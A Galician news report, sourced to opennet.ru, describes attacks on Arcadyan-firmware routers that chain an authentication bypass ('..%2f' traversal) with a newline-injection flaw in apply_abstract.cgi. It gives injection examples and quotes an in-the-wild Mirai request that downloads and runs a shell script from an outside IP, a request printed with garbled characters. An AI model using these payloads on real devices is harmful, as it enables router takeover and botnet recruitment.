Rexistrouse un ataque masivo na rede contra enrutadores domésticos cuxo firmware utiliza unha implementación de servidor HTTP da empresa Arcadyan. Para conseguir o control dos dispositivos, úsase unha combinación de dúas vulnerabilidades que permite a execución remota de código arbitrario con dereitos de root. O problema afecta a unha gama bastante ampla de enrutadores ADSL de Arcadyan, ASUS e Buffalo, así como a dispositivos subministrados baixo as marcas Beeline (o problema confírmase en Smart Box Flash), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone e outros operadores de telecomunicacións. Nótase que o problema estivo presente no firmware Arcadyan durante máis de 10 anos e durante este tempo logrou migrar a polo menos 20 modelos de dispositivos de 17 fabricantes diferentes.
A primeira vulnerabilidade, CVE-2021-20090, fai posible acceder a calquera script da interface web sen autenticación. A esencia da vulnerabilidade é que na interface web algúns directorios a través dos cales se envían imaxes, ficheiros CSS e scripts JavaScript son accesibles sen autenticación. Neste caso, os directorios aos que se permite o acceso sen autenticación compróbanse mediante a máscara inicial. Especificar caracteres “../” nos camiños para ir ao directorio principal está bloqueado polo firmware, pero o uso da combinación “..%2f” omítase. Así, é posible abrir páxinas protexidas cando se envían solicitudes como “http://192.168.1.1/images/..%2findex.htm”.
A segunda vulnerabilidade, CVE-2021-20091, permite que un usuario autenticado realice cambios na configuración do sistema do dispositivo enviando parámetros con formato especial ao script apply_abstract.cgi, que non verifica a presenza dun carácter de nova liña nos parámetros. . Por exemplo, ao realizar unha operación de ping, un atacante pode especificar o valor "192.168.1.2%0AARC_SYS_TelnetdEnable=1" no campo co enderezo IP que se está a comprobar e o script ao crear o ficheiro de configuración /tmp/etc/config/ .glbcfg, escribirá a liña "AARC_SYS_TelnetdEnable=1" nel ", o que activa o servidor telnetd, que proporciona acceso sen restricións ao shell de comandos con dereitos de root. Do mesmo xeito, ao establecer o parámetro AARC_SYS, pode executar calquera código no sistema. A primeira vulnerabilidade fai posible executar un script problemático sen autenticación accedendo a el como "/images/..%2fapply_abstract.cgi".
Para explotar vulnerabilidades, un atacante debe poder enviar unha solicitude ao porto de rede no que se está a executar a interface web. A xulgar pola dinámica de propagación do ataque, moitos operadores deixan o acceso aos seus dispositivos desde a rede externa para simplificar o diagnóstico de problemas por parte do servizo de soporte. Se o acceso á interface está limitado só á rede interna, pódese levar a cabo un ataque desde unha rede externa mediante a técnica de "revinculación de DNS". As vulnerabilidades xa se están utilizando activamente para conectar os enrutadores á botnet Mirai: POST /images/..%2fapply_abstract.cgi HTTP/1.1 Conexión: pechar User-Agent: Dark action=start_ping&submit_button=ping.html& action_params=blink_time%3D5&ARC_ping_ipaddress=212.192.241.7. 0%1A ARC_SYS_TelnetdEnable=0& %212.192.241.72AARC_SYS_=cd+/tmp; wget+http://212.192.241.72/lolol.sh; curl+-O+http://777/lolol.sh; chmod+0+lolol.sh; sh+lolol.sh&ARC_ping_status=4&TMP_Ping_Type=XNUMX
Fonte: opennet.ru